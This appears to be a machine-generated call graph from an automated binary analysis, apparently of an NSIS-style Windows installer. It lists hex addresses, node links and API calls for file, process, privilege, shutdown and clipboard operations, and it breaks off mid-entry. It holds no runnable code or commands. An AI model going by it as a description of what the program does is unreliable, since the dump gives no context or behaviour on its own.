GetFileAttributesW CreateFileW 5388->5410 5390 40298a 5391 402a40 5390->5391 5392 4029a5 GlobalAlloc 5390->5392 5393 402a28 5390->5393 5394 402a47 DeleteFileW 5391->5394 5395 402a5a 5391->5395 5392->5393 5396 4029be 5392->5396 5397 4032b9 39 API calls 5393->5397 5394->5395 5411 4034b4 SetFilePointer 5396->5411 5399 402a35 CloseHandle 5397->5399 5399->5391 5400 4029c4 5401 40349e ReadFile 5400->5401 5402 4029cd GlobalAlloc 5401->5402 5403 402a11 5402->5403 5404 4029dd 5402->5404 5406 4060c3 WriteFile 5403->5406 5405 4032b9 39 API calls 5404->5405 5409 4029ea 5405->5409 5407 402a1d GlobalFree 5406->5407 5407->5393 5408 402a08 GlobalFree 5408->5403 5409->5408 5410->5390 5411->5400 5412 4045d6 lstrcpynW lstrlenW 4824 4014d7 4825 402d89 21 API calls 4824->4825 4826 4014dd Sleep 4825->4826 4828 402c2f 4826->4828 5413 40195b 5414 402dab 21 API calls 5413->5414 5415 401962 lstrlenW 5414->5415 5416 40263d 5415->5416 5098 4020dd 5099 4020ef 5098->5099 5109 4021a1 5098->5109 5100 402dab 21 API calls 5099->5100 5102 4020f6 5100->5102 5101 401423 28 API calls 5107 4022fb 5101->5107 5103 402dab 21 API calls 5102->5103 5104 4020ff 5103->5104 5105 402115 LoadLibraryExW 5104->5105 5106 402107 GetModuleHandleW 5104->5106 5108 402126 5105->5108 5105->5109 5106->5105 5106->5108 5121 406984 5108->5121 5109->5101 5112 402170 5116 4055a6 28 API calls 5112->5116 5113 402137 5114 402156 5113->5114 5115 40213f 5113->5115 5126 701d1817 5114->5126 5117 401423 28 API calls 5115->5117 5118 402147 5116->5118 5117->5118 5118->5107 5119 402193 FreeLibrary 5118->5119 5119->5107 5168 406543 WideCharToMultiByte 5121->5168 5123 4069a1 5124 4069a8 GetProcAddress 5123->5124 5125 402131 5123->5125 5124->5125 5125->5112 5125->5113 5127 701d184a 5126->5127 5169 701d1bff 5127->5169 5129 701d1851 5130 701d1976 5129->5130 5131 701d1869 5129->5131 5132 701d1862 5129->5132 5130->5118 5203 701d2480 5131->5203 5219 701d243e 5132->5219 5137 701d18cd 5141 701d191e 5137->5141 5142 701d18d3 5137->5142 5138 701d18af 5232 701d2655 5138->5232 5139 701d187f 5144 701d1885 5139->5144 5145 701d1890 5139->5145 5140 701d1898 5152 701d188e 5140->5152 5229 701d2e23 5140->5229 5149 701d2655 10 API calls 5141->5149 5251 701d1666 5142->5251 5144->5152 5213 701d2b98 5144->5213 5223 701d2810 5145->5223 5155 701d190f 5149->5155 5150 701d18b5 5243 701d1654 5150->5243 5152->5137 5152->5138 5167 701d1965 5155->5167 5257 701d2618 5155->5257 5157 701d1896 5157->5152 5158 701d2655 10 API calls 5158->5155 5161 701d196f GlobalFree 5161->5130 5164 701d1951 5164->5167 5261 701d15dd wsprintfW 5164->5261 5165 701d194a FreeLibrary 5165->5164 5167->5130 5167->5161 5168->5123 5264 701d12bb GlobalAlloc 5169->5264 5171 701d1c26 5265 701d12bb GlobalAlloc 5171->5265 5173 701d1e6b GlobalFree GlobalFree GlobalFree 5174 701d1e88 5173->5174 5187 701d1ed2 5173->5187 5175 701d227e 5174->5175 5183 701d1e9d 5174->5183 5174->5187 5177 701d22a0 GetModuleHandleW 5175->5177 5175->5187 5176 701d1d26 GlobalAlloc 5196 701d1c31 5176->5196 5180 701d22c6 5177->5180 5181 701d22b1 LoadLibraryW 5177->5181 5178 701d1d71 lstrcpyW 5182 701d1d7b lstrcpyW 5178->5182 5179 701d1d8f GlobalFree 5179->5196 5272 701d16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5180->5272 5181->5180 5181->5187 5182->5196 5183->5187 5268 701d12cc 5183->5268 5185 701d2318 5185->5187 5189 701d2325 lstrlenW 5185->5189 5186 701d2126 5271 701d12bb GlobalAlloc 5186->5271 5187->5129 5273 701d16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5189->5273 5191 701d2067 GlobalFree 5191->5196 5192 701d21ae 5192->5187 5199 701d2216 lstrcpyW 5192->5199 5193 701d22d8 5193->5185 5201 701d2302 GetProcAddress 5193->5201 5195 701d233f 5195->5187 5196->5173 5196->5176 5196->5178 5196->5179 5196->5182 5196->5186 5196->5187 5196->5191 5196->5192 5197 701d12cc 2 API calls 5196->5197 5198 701d1dcd 5196->5198 5197->5196 5198->5196 5266 701d162f GlobalSize GlobalAlloc 5198->5266 5199->5187 5201->5185 5202 701d212f 5202->5129 5204 701d2498 5203->5204 5206 701d25c1 GlobalFree 5204->5206 5208 701d256b GlobalAlloc CLSIDFromString 5204->5208 5209 701d2540 GlobalAlloc WideCharToMultiByte 5204->5209 5210 701d12cc GlobalAlloc lstrcpynW 5204->5210 5212 701d258a 5204->5212 5275 701d135a 5204->5275 5206->5204 5207 701d186f 5206->5207 5207->5139 5207->5140 5207->5152 5208->5206 5209->5206 5210->5204 5212->5206 5279 701d27a4 5212->5279 5215 701d2baa 5213->5215 5214 701d2c4f VirtualAlloc 5218 701d2c6d 5214->5218 5215->5214 5217 701d2d39 5217->5152 5282 701d2b42 5218->5282 5220 701d2453 5219->5220 5221 701d245e GlobalAlloc 5220->5221 5222 701d1868 5220->5222 5221->5220 5222->5131 5227 701d2840 5223->5227 5224 701d28ee 5226 701d28f4 GlobalSize 5224->5226 5228 701d28fe 5224->5228 5225 701d28db GlobalAlloc 5225->5228 5226->5228 5227->5224 5227->5225 5228->5157 5231 701d2e2e 5229->5231 5230 701d2e6e GlobalFree 5231->5230 5286 701d12bb GlobalAlloc 5232->5286 5234 701d26d8 MultiByteToWideChar 5240 701d265f 5234->5240 5235 701d270b lstrcpynW 5235->5240 5236 701d26fa StringFromGUID2 5236->5240 5237 701d271e wsprintfW 5237->5240 5238 701d2742 GlobalFree 5238->5240 5239 701d2777 GlobalFree 5239->5150 5240->5234 5240->5235 5240->5236 5240->5237 5240->5238 5240->5239 5241 701d1312 2 API calls 5240->5241 5287 701d1381 5240->5287 5241->5240 5291 701d12bb GlobalAlloc 5243->5291 5245 701d1659 5246 701d1666 2 API calls 5245->5246 5247 701d1663 5246->5247 5248 701d1312 5247->5248 5249 701d131b GlobalAlloc lstrcpynW 5248->5249 5250 701d1355 GlobalFree 5248->5250 5249->5250 5250->5155 5252 701d1672 wsprintfW 5251->5252 5255 701d169f lstrcpyW 5251->5255 5256 701d16b8 5252->5256 5255->5256 5256->5158 5258 701d1931 5257->5258 5259 701d2626 5257->5259 5258->5164 5258->5165 5259->5258 5260 701d2642 GlobalFree 5259->5260 5260->5259 5262 701d1312 2 API calls 5261->5262 5263 701d15fe 5262->5263 5263->5167 5264->5171 5265->5196 5267 701d164d 5266->5267 5267->5198 5274 701d12bb GlobalAlloc 5268->5274 5270 701d12db lstrcpynW 5270->5187 5271->5202 5272->5193 5273->5195 5274->5270 5276 701d1361 5275->5276 5277 701d12cc 2 API calls 5276->5277 5278 701d137f 5277->5278 5278->5204 5280 701d2808 5279->5280 5281 701d27b2 VirtualAlloc 5279->5281 5280->5212 5281->5280 5283 701d2b4d 5282->5283 5284 701d2b5d 5283->5284 5285 701d2b52 GetLastError 5283->5285 5284->5217 5285->5284 5286->5240 5288 701d13ac 5287->5288 5289 701d138a 5287->5289 5288->5240 5289->5288 5290 701d1390 lstrcpyW 5289->5290 5290->5288 5291->5245 5417 701d1000 5420 701d101b 5417->5420 5421 701d15b6 GlobalFree 5420->5421 5422 701d1020 5421->5422 5423 701d1024 5422->5423 5424 701d1027 GlobalAlloc 5422->5424 5425 701d15dd 3 API calls 5423->5425 5424->5423 5426 701d1019 5425->5426 5427 402b5e 5428 402bb0 5427->5428 5429 402b65 5427->5429 5430 406915 5 API calls 5428->5430 5431 402bae 5429->5431 5433 402d89 21 API calls 5429->5433 5432 402bb7 5430->5432 5434 402dab 21 API calls 5432->5434 5435 402b73 5433->5435 5436 402bc0 5434->5436 5437 402d89 21 API calls 5435->5437 5436->5431 5438 402bc4 IIDFromString 5436->5438 5440 402b7f 5437->5440 5438->5431 5439 402bd3 5438->5439 5439->5431 5445 406521 lstrcpynW 5439->5445 5444 406468 wsprintfW 5440->5444 5442 402bf0 CoTaskMemFree 5442->5431 5444->5431 5445->5442 5453 40465f 5454 404791 5453->5454 5455 404677 5453->5455 5456 4047fb 5454->5456 5459 4048c5 5454->5459 5462 4047cc GetDlgItem SendMessageW 5454->5462 5458 4044a0 22 API calls 5455->5458 5457 404805 GetDlgItem 5456->5457 5456->5459 5460 404886 5457->5460 5461 40481f 5457->5461 5463 4046de 5458->5463 5464 404507 8 API calls 5459->5464 5460->5459 5465 404898 5460->5465 5461->5460 5469 404845 SendMessageW LoadCursorW SetCursor 5461->5469 5486 4044c2 KiUserCallbackDispatcher 5462->5486 5467 4044a0 22 API calls 5463->5467 5468 4048c0 5464->5468 5470 4048ae 5465->5470 5471 40489e SendMessageW 5465->5471 5473 4046eb CheckDlgButton 5467->5473 5490 40490e 5469->5490 5470->5468 5475 4048b4 SendMessageW 5470->5475 5471->5470 5472 4047f6 5487 4048ea 5472->5487 5484 4044c2 KiUserCallbackDispatcher 5473->5484 5475->5468 5479 404709 GetDlgItem 5485 4044d5 SendMessageW 5479->5485 5481 40471f SendMessageW 5482 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5481->5482 5483 40473c GetSysColor 5481->5483 5482->5468 5483->5482 5484->5479 5485->5481 5486->5472 5488 4048f8 5487->5488 5489 4048fd SendMessageW 5487->5489 5488->5489 5489->5456 5493 405b47 ShellExecuteExW 5490->5493 5492 404874 LoadCursorW SetCursor 5492->5460 5493->5492 5494 701d103d 5495 701d101b 5 API calls 5494->5495 5496 701d1056 5495->5496 5497 402a60 5498 402d89 21 API calls 5497->5498 5499 402a66 5498->5499 5500 402aa9 5499->5500 5501 402a8d 5499->5501 5506 402933 5499->5506 5504 402ac3 5500->5504 5505 402ab3 5500->5505 5502 402a92 5501->5502 5503 402aa3 5501->5503 5511 406521 lstrcpynW 5502->5511 5512 406468 wsprintfW 5503->5512 5508 40655e 21 API calls 5504->5508 5507 402d89 21 API calls 5505->5507 5507->5506 5508->5506 5511->5506 5512->5506 4300 401761 4306 402dab 4300->4306 4304 40176f 4305 406040 2 API calls 4304->4305 4305->4304 4307 402db7 4306->4307 4308 40655e 21 API calls 4307->4308 4309 402dd8 4308->4309 4310 401768 4309->4310 4311 4067cf 5 API calls 4309->4311 4312 406040 4310->4312 4311->4310 4313 40604d GetTickCount GetTempFileNameW 4312->4313 4314 406087 4313->4314 4315 406083 4313->4315 4314->4304 4315->4313 4315->4314 5513 401d62 5514 402d89 21 API calls 5513->5514 5515 401d73 SetWindowLongW 5514->5515 5516 402c2f 5515->5516 4428 401ee3 4436 402d89 4428->4436 4430 401ee9 4431 402d89 21 API calls 4430->4431 4432 401ef5 4431->4432 4433 401f01 ShowWindow 4432->4433 4434 401f0c EnableWindow 4432->4434 4435 402c2f 4433->4435 4434->4435 4437 40655e 21 API calls 4436->4437 4438 402d9e 4437->4438 4438->4430 5517 4028e3 5518 4028eb 5517->5518 5519 4028ef FindNextFileW 5518->5519 5521 402901 5518->5521 5520 402948 5519->5520 5519->5521 5523 406521 lstrcpynW 5520->5523 5523->5521 4485 4056e5 4486 405706 GetDlgItem GetDlgItem GetDlgItem 4485->4486 4487 40588f 4485->4487 4531 4044d5 SendMessageW 4486->4531 4489 4058c0 4487->4489 4490 405898 GetDlgItem CreateThread CloseHandle 4487->4490 4491 4058eb 4489->4491 4493 405910 4489->4493 4494 4058d7 ShowWindow ShowWindow 4489->4494 4490->4489 4534 405679 OleInitialize 4490->4534 4495 4058f7 4491->4495 4497 40594b 4491->4497 4492 405776 4496 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4492->4496 4501 404507 8 API calls 4493->4501 4533 4044d5 SendMessageW 4494->4533 4499 405925 ShowWindow 4495->4499 4500 4058ff 4495->4500 4502 4057eb 4496->4502 4503 4057cf SendMessageW SendMessageW 4496->4503 4497->4493 4504 405959 SendMessageW 4497->4504 4507 405945 4499->4507 4508 405937 4499->4508 4505 404479 SendMessageW 4500->4505 4506 40591e 4501->4506 4509 4057f0 SendMessageW 4502->4509 4510 4057fe 4502->4510 4503->4502 4504->4506 4511 405972 CreatePopupMenu 4504->4511 4505->4493 4513 404479 SendMessageW 4507->4513 4512 4055a6 28 API calls 4508->4512 4509->4510 4515 4044a0 22 API calls 4510->4515 4514 40655e 21 API calls 4511->4514 4512->4507 4513->4497 4516 405982 AppendMenuW 4514->4516 4517 40580e 4515->4517 4518 4059b2 TrackPopupMenu 4516->4518 4519 40599f GetWindowRect 4516->4519 4520 405817 ShowWindow 4517->4520 4521 40584b GetDlgItem SendMessageW 4517->4521 4518->4506 4522 4059cd 4518->4522 4519->4518 4523 40583a 4520->4523 4524 40582d ShowWindow 4520->4524 4521->4506 4525 405872 SendMessageW SendMessageW 4521->4525 4526 4059e9 SendMessageW 4522->4526 4532 4044d5 SendMessageW 4523->4532 4524->4523 4525->4506 4526->4526 4527 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4526->4527 4529 405a2b SendMessageW 4527->4529 4529->4529 4530 405a54 GlobalUnlock SetClipboardData CloseClipboard 4529->4530 4530->4506 4531->4492 4532->4521 4533->4491 4535 4044ec SendMessageW 4534->4535 4539 40569c 4535->4539 4536 4056c3 4537 4044ec SendMessageW 4536->4537 4538 4056d5 OleUninitialize 4537->4538 4539->4536 4540 401389 2 API calls 4539->4540 4540->4539 5524 404ce7 5525 404d13 5524->5525 5526 404cf7 5524->5526 5528 404d46 5525->5528 5529 404d19 SHGetPathFromIDListW 5525->5529 5535 405b65 GetDlgItemTextW 5526->5535 5531 404d29 5529->5531 5534 404d30 SendMessageW 5529->5534 5530 404d04 SendMessageW 5530->5525 5532 40140b 2 API calls 5531->5532 5532->5534 5534->5528 5535->5530 5536 401568 5537 402ba9 5536->5537 5540 406468 wsprintfW 5537->5540 5539 402bae 5540->5539 5541 40196d 5542 402d89 21 API calls 5541->5542 5543 401974 5542->5543 5544 402d89 21 API calls 5543->5544 5545 401981 5544->5545 5546 402dab 21 API calls 5545->5546 5547 401998 lstrlenW 5546->5547 5549 4019a9 5547->5549 5548 4019ea 5549->5548 5553 406521 lstrcpynW 5549->5553 5551 4019da 5551->5548 5552 4019df lstrlenW 5551->5552 5552->5548 5553->5551 5554 40166f 5555 402dab 21 API calls 5554->5555 5556 401675 5555->5556 5557 40687e 2 API calls 5556->5557 5558 40167b 5557->5558 5559 402af0 5560 402d89 21 API calls 5559->5560 5562 402af6 5560->5562 5561 402933 5562->5561 5563 40655e 21 API calls 5562->5563 5563->5561 4717 4026f1 4718 402d89 21 API calls 4717->4718 4723 402700 4718->4723 4719 40274a ReadFile 4719->4723 4730 40283d 4719->4730 4720 4027e3 4720->4723 4720->4730 4731 4060f2 SetFilePointer 4720->4731 4721 406094 ReadFile 4721->4723 4723->4719 4723->4720 4723->4721 4724 40278a MultiByteToWideChar 4723->4724 4725 40283f 4723->4725 4727 4027b0 SetFilePointer MultiByteToWideChar 4723->4727 4728 402850 4723->4728 4723->4730 4724->4723 4740 406468 wsprintfW 4725->4740 4727->4723 4729 402871 SetFilePointer 4728->4729 4728->4730 4729->4730 4732 40610e 4731->4732 4739 406126 4731->4739 4733 406094 ReadFile 4732->4733 4734 40611a 4733->4734 4735 406157 SetFilePointer 4734->4735 4736 40612f SetFilePointer 4734->4736 4734->4739 4735->4739 4736->4735 4737 40613a 4736->4737 4738 4060c3 WriteFile 4737->4738 4738->4739 4739->4720 4740->4730 4741 401774 4742 402dab 21 API calls 4741->4742 4743 40177b 4742->4743 4744 4017a3 4743->4744 4745 40179b 4743->4745 4803 406521 lstrcpynW 4744->4803 4802 406521 lstrcpynW 4745->4802 4748 4017a1 4752 4067cf 5 API calls 4748->4752 4749 4017ae 4750 405df0 3 API calls 4749->4750 4751 4017b4 lstrcatW 4750->4751 4751->4748 4770 4017c0 4752->4770 4753 4017fc 4755 405fec 2 API calls 4753->4755 4754 40687e 2 API calls 4754->4770 4755->4770 4757 4017d2 CompareFileTime 4757->4770 4758 401892 4760 4055a6 28 API calls 4758->4760 4759 401869 4761 4055a6 28 API calls 4759->4761 4778 40187e 4759->4778 4763 40189c 4760->4763 4761->4778 4762 406521 lstrcpynW 4762->4770 4781 4032b9 4763->4781 4766 4018c3 SetFileTime 4767 4018d5 CloseHandle 4766->4767 4769 4018e6 4767->4769 4767->4778 4768 40655e 21 API calls 4768->4770 4771 4018eb 4769->4771 4772 4018fe 4769->4772 4770->4753 4770->4754 4770->4757 4770->4758 4770->4759 4770->4762 4770->4768 4777 405b81 MessageBoxIndirectW 4770->4777 4780 406011 GetFileAttributesW CreateFileW 4770->4780 4773 40655e 21 API calls 4771->4773 4774 40655e 21 API calls 4772->4774 4775 4018f3 lstrcatW 4773->4775 4776 401906 4774->4776 4775->4776 4776->4778 4779 405b81 MessageBoxIndirectW 4776->4779 4777->4770 4779->4778 4780->4770 4783 4032d2 4781->4783 4782 4032fd 4804 40349e 4782->4804 4783->4782 4814 4034b4 SetFilePointer 4783->4814 4787 40331a GetTickCount 4798 40332d 4787->4798 4788 40343e 4789 403442 4788->4789 4794 40345a 4788->4794 4791 40349e ReadFile 4789->4791 4790 4018af 4790->4766 4790->4767 4791->4790 4792 40349e ReadFile 4792->4794 4793 40349e ReadFile 4793->4798 4794->4790 4794->4792 4795 4060c3 WriteFile 4794->4795 4795->4794 4797 403393 GetTickCount 4797->4798 4798->4790 4798->4793 4798->4797 4799 4033bc MulDiv wsprintfW 4798->4799 4801 4060c3 WriteFile 4798->4801 4807 406a90 4798->4807 4800 4055a6 28 API calls 4799->4800 4800->4798 4801->4798 4802->4748 4803->4749 4805 406094 ReadFile 4804->4805 4806 403308 4805->4806 4806->4787 4806->4788 4806->4790 4808 406ab5 4807->4808 4811 406abd 4807->4811 4808->4798 4809 406b44 GlobalFree 4810 406b4d GlobalAlloc 4809->4810 4810->4808 4810->4811 4811->4808 4811->4809 4811->4810 4812 406bc4 GlobalAlloc 4811->4812 4813 406bbb GlobalFree 4811->4813 4812->4808 4812->4811 4813->4812 4814->4782 5578 4014f5 SetForegroundWindow 5579 402c2f 5578->5579 5580 401a77 5581 402d89 21 API calls 5580->5581 5582 401a80 5581->5582 5583 402d89 21 API calls 5582->5583 5584 401a25 5583->5584 5585 401578 5586 401591 5585->5586 5587 401588 ShowWindow 5585->5587 5588 40159f ShowWindow 5586->5588 5589 402c2f 5586->5589 5587->5586 5588->5589 5590 4023f9 5591 402dab 21 API calls 5590->5591 5592 402408 5591->5592 5593 402dab 21 API calls 5592->5593 5594 402411 5593->5594 5595 402dab 21 API calls 5594->5595 5596 40241b GetPrivateProfileStringW 5595->5596 5597 401ffb 5598 402dab 21 API calls 5597->5598 5599 402002 5598->5599 5600 40687e 2 API calls 5599->5600 5601 402008 5600->5601 5603 402019 5601->5603 5604 406468 wsprintfW 5601->5604 5604->5603 4864 4034fc SetErrorMode GetVersionExW 4865 403550 GetVersionExW 4864->4865 4866 403588 4864->4866 4865->4866 4867 4035df 4866->4867 4868 406915 5 API calls 4866->4868 4869 4068a5 3 API calls 4867->4869 4868->4867 4870 4035f5 lstrlenA 4869->4870 4870->4867 4871 403605 4870->4871 4872 406915 5 API calls 4871->4872 4873 40360c 4872->4873 4874 406915 5 API calls 4873->4874 4875 403613 4874->4875 4876 406915 5 API calls 4875->4876 4877 40361f #17 OleInitialize SHGetFileInfoW 4876->4877 4952 406521 lstrcpynW 4877->4952 4880 40366e GetCommandLineW 4953 406521 lstrcpynW 4880->4953 4882 403680 4883 405e1d CharNextW 4882->4883 4884 4036a6 CharNextW 4883->4884 4890 4036b8 4884->4890 4885 4037ba 4886 4037ce GetTempPathW 4885->4886 4954 4034cb 4886->4954 4888 4037e6 4891 403840 DeleteFileW 4888->4891 4892 4037ea GetWindowsDirectoryW lstrcatW 4888->4892 4889 405e1d CharNextW 4889->4890 4890->4885 4890->4889 4898 4037bc 4890->4898 4964 403082 GetTickCount GetModuleFileNameW 4891->4964 4894 4034cb 12 API calls 4892->4894 4896 403806 4894->4896 4895 403854 4904 405e1d CharNextW 4895->4904 4935 4038fb 4895->4935 4943 40390b 4895->4943 4896->4891 4897 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4896->4897 4899 4034cb 12 API calls 4897->4899 5048 406521 lstrcpynW 4898->5048 4902 403838 4899->4902 4902->4891 4902->4943 4919 403873 4904->4919 4906 403a59 4908 405b81 MessageBoxIndirectW 4906->4908 4907 403a7d 4909 403b01 ExitProcess 4907->4909 4910 403a85 GetCurrentProcess OpenProcessToken 4907->4910 4914 403a67 ExitProcess 4908->4914 4915 403ad1 4910->4915 4916 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4910->4916 4911 4038d1 4917 405ef8 18 API calls 4911->4917 4912 403914 4918 405aec 5 API calls 4912->4918 4920 406915 5 API calls 4915->4920 4916->4915 4921 4038dd 4917->4921 4922 403919 lstrlenW 4918->4922 4919->4911 4919->4912 4923 403ad8 4920->4923 4921->4943 5049 406521 lstrcpynW 4921->5049 5051 406521 lstrcpynW 4922->5051 4924 403aed ExitWindowsEx 4923->4924 4926 403afa 4923->4926 4924->4909 4924->4926 4929 40140b 2 API calls 4926->4929 4928 403933 4932 40394b 4928->4932 5052 406521 lstrcpynW 4928->5052 4929->4909 4930 4038f0 5050 406521 lstrcpynW 4930->5050 4934 403971 wsprintfW 4932->4934 4949 40399d 4932->4949 4936 40655e 21 API calls 4934->4936 4992 403bf3 4935->4992 4936->4932 4937 405a75 2 API calls 4937->4949 4938 405acf 2 API calls 4938->4949 4939 4039e7 SetCurrentDirectoryW 4941 4062e1 40 API calls 4939->4941 4940 4039ad GetFileAttributesW 4942 4039b9 DeleteFileW 4940->4942 4940->4949 4944 4039f6 CopyFileW 4941->4944 4942->4949 5056 403b19 4943->5056 4944->4943 4944->4949 4945 405c2d 71 API calls 4945->4949 4946 4062e1 40 API calls 4946->4949 4947 40655e 21 API calls 4947->4949 4949->4932 4949->4934 4949->4937 4949->4938 4949->4939 4949->4940 4949->4943 4949->4945 4949->4946 4949->4947 4950 403a6f CloseHandle 4949->4950 4951 40687e 2 API calls 4949->4951 5053 405b04 CreateProcessW 4949->5053 4950->4943 4951->4949 4952->4880 4953->4882 4955 4067cf 5 API calls 4954->4955 4957 4034d7 4955->4957 4956 4034e1 4956->4888 4957->4956 4958 405df0 3 API calls 4957->4958 4959 4034e9 4958->4959 4960 405acf 2 API calls 4959->4960 4961 4034ef 4960->4961 4962 406040 2 API calls 4961->4962 4963 4034fa 4962->4963 4963->4888 5063 406011 GetFileAttributesW CreateFileW 4964->5063 4966 4030c2 4986 4030d2 4966->4986 5064 406521 lstrcpynW 4966->5064 4968 4030e8 4969 405e3c 2 API calls 4968->4969 4970 4030ee 4969->4970 5065 406521 lstrcpynW 4970->5065 4972 4030f9 GetFileSize 4973 403110 4972->4973 4989 4031f3 4972->4989 4976 40349e ReadFile 4973->4976 4978 40325f 4973->4978 4973->4986 4987 40301e 6 API calls 4973->4987 4973->4989 4975 4031fc 4977 40322c GlobalAlloc 4975->4977 4975->4986 5078 4034b4 SetFilePointer 4975->5078 4976->4973 5077 4034b4 SetFilePointer 4977->5077 4982 40301e 6 API calls 4978->4982 4981 403247 4985 4032b9 39 API calls 4981->4985 4982->4986 4983 403215 4984 40349e ReadFile 4983->4984 4988 403220 4984->4988 4990 403253 4985->4990 4986->4895 4987->4973 4988->4977 4988->4986 5066 40301e 4989->5066 4990->4986 4991 403290 SetFilePointer 4990->4991 4991->4986 4993 406915 5 API calls 4992->4993 4994 403c07 4993->4994 4995 403c0d 4994->4995 4996 403c1f 4994->4996 5091 406468 wsprintfW 4995->5091 4997 4063ef 3 API calls 4996->4997 4998 403c4f 4997->4998 4999 403c6e lstrcatW 4998->4999 5001 4063ef 3 API calls 4998->5001 5002 403c1d 4999->5002 5001->4999 5083 403ec9 5002->5083 5005 405ef8 18 API calls 5006 403ca0 5005->5006 5007 403d34 5006->5007 5009 4063ef 3 API calls 5006->5009 5008 405ef8 18 API calls 5007->5008 5010 403d3a 5008->5010 5011 403cd2 5009->5011 5012 403d4a LoadImageW 5010->5012 5015 40655e 21 API calls 5010->5015 5011->5007 5019 403cf3 lstrlenW 5011->5019 5023 405e1d CharNextW 5011->5023 5013 403df0 5012->5013 5014 403d71 RegisterClassW 5012->5014 5018 40140b 2 API calls 5013->5018 5016 403da7 SystemParametersInfoW CreateWindowExW 5014->5016 5017 403dfa 5014->5017 5015->5012 5016->5013 5017->4943 5022 403df6 5018->5022 5020 403d01 lstrcmpiW 5019->5020 5021 403d27 5019->5021 5020->5021 5025 403d11 GetFileAttributesW 5020->5025 5026 405df0 3 API calls 5021->5026 5022->5017 5028 403ec9 22 API calls 5022->5028 5024 403cf0 5023->5024 5024->5019 5027 403d1d 5025->5027 5029 403d2d 5026->5029 5027->5021 5030 405e3c 2 API calls 5027->5030 5031 403e07 5028->5031 5092 406521 lstrcpynW 5029->5092 5030->5021 5033 403e13 ShowWindow 5031->5033 5034 403e96 5031->5034 5036 4068a5 3 API calls 5033->5036 5035 405679 5 API calls 5034->5035 5037 403e9c 5035->5037 5038 403e2b 5036->5038 5039 403ea0 5037->5039 5040 403eb8 5037->5040 5041 403e39 GetClassInfoW 5038->5041 5045 4068a5 3 API calls 5038->5045 5039->5017 5047 40140b 2 API calls 5039->5047 5044 40140b 2 API calls 5040->5044 5042 403e63 DialogBoxParamW 5041->5042 5043 403e4d GetClassInfoW RegisterClassW 5041->5043 5046 40140b 2 API calls 5042->5046 5043->5042 5044->5017 5045->5041 5046->5017 5047->5017 5048->4886 5049->4930 5050->4935 5051->4928 5052->4932 5054 405b43 5053->5054 5055 405b37 CloseHandle 5053->5055 5054->4949 5055->5054 5057 403b31 5056->5057 5058 403b23 CloseHandle 5056->5058 5094 403b5e 5057->5094 5058->5057 5061 405c2d 71 API calls 5062 403a4c OleUninitialize 5061->5062 5062->4906 5062->4907 5063->4966 5064->4968 5065->4972 5067 403027 5066->5067 5068 40303f 5066->5068 5069 403030 DestroyWindow 5067->5069 5070 403037 5067->5070 5071 403047 5068->5071 5072 40304f GetTickCount 5068->5072 5069->5070 5070->4975 5079 406951 5071->5079 5074 403080 5072->5074 5075 40305d CreateDialogParamW ShowWindow 5072->5075 5074->4975 5075->5074 5077->4981 5078->4983 5080 40696e PeekMessageW 5079->5080 5081 406964 DispatchMessageW 5080->5081 5082 40304d 5080->5082 5081->5080 5082->4975 5084 403edd 5083->5084 5093 406468 wsprintfW 5084->5093 5086 403f4e 5087 403f82 22 API calls 5086->5087 5089 403f53 5087->5089 5088 403c7e 5088->5005 5089->5088 5090 40655e 21 API calls 5089->5090 5090->5089 5091->5002 5092->5007 5093->5086 5095 403b6c 5094->5095 5096 403b36 5095->5096 5097 403b71 FreeLibrary GlobalFree 5095->5097 5096->5061 5097->5096 5097->5097 5605 401b7c 5606 402dab 21 API calls 5605->5606 5607 401b83 5606->5607 5608 402d89 21 API calls 5607->5608 5609 401b8c wsprintfW 5608->5609 5610 402c2f 5609->5610 5618 401000 5619 401037 BeginPaint GetClientRect 5618->5619 5620 40100c DefWindowProcW 5618->5620 5622 4010f3 5619->5622 5623 401179 5620->5623 5624 401073 CreateBrushIndirect FillRect DeleteObject 5622->5624 5625 4010fc 5622->5625 5624->5622 5626 401102 CreateFontIndirectW 5625->5626 5627 401167 EndPaint 5625->5627 5626->5627 5628 401112 6 API calls 5626->5628 5627->5623 5628->5627 5629 401680 5630 402dab 21 API calls 5629->5630 5631 401687 5630->5631 5632 402dab 21 API calls 5631->5632 5633 401690 5632->5633 5634 402dab 21 API calls 5633->5634 5635 401699 MoveFileW 5634->5635 5636 4016ac 5635->5636 5642 4016a5 5635->5642 5638 40687e 2 API calls 5636->5638 5640 4022fb 5636->5640 5637 401423 28 API calls 5637->5640 5639 4016bb 5638->5639 5639->5640 5641 4062e1 40 API calls 5639->5641 5641->5642 5642->5637 5643 401503 5644 401508 5643->5644 5646 401520 5643->5646 5645 402d89 21 API calls 5644->5645 5645->5646 4456 402304 4457 402dab 21 API calls 4456->4457 4458 40230a 4457->4458 4459 402dab 21 API calls 4458->4459 4460 402313 4459->4460 4461 402dab 21 API calls 4460->4461 4462 40231c 4461->4462 4471 40687e FindFirstFileW 4462->4471 4465 402336 lstrlenW lstrlenW 4467 4055a6 28 API calls 4465->4467 4468 402374 SHFileOperationW 4467->4468 4469 402329 4468->4469 4470 402331 4468->4470 4469->4470 4474 4055a6 4469->4474 4472 406894 FindClose 4471->4472 4473 402325 4471->4473 4472->4473 4473->4465 4473->4469 4475 4055c1 4474->4475 4483 405663 4474->4483 4476 4055dd lstrlenW 4475->4476 4477 40655e 21 API calls 4475->4477 4478 405606 4476->4478 4479 4055eb lstrlenW 4476->4479 4477->4476 4480 405619 4478->4480 4481 40560c SetWindowTextW 4478->4481 4482 4055fd lstrcatW 4479->4482 4479->4483 4480->4483 4484 40561f SendMessageW SendMessageW SendMessageW 4480->4484 4481->4480 4482->4478 4483->4470 4484->4483 5647 401a04 5648 402dab 21 API calls 5647->5648 5649 401a0b 5648->5649 5650 402dab 21 API calls 5649->5650 5651 401a14 5650->5651 5652 401a1b lstrcmpiW 5651->5652 5653 401a2d lstrcmpW 5651->5653 5654 401a21 5652->5654 5653->5654 5655 701d1058 5658 701d1074 5655->5658 5656 701d10dd 5657 701d1092 5660 701d15b6 GlobalFree 5657->5660 5658->5656 5658->5657 5659 701d15b6 GlobalFree 5658->5659 5659->5657 5661 701d10a2 5660->5661 5662 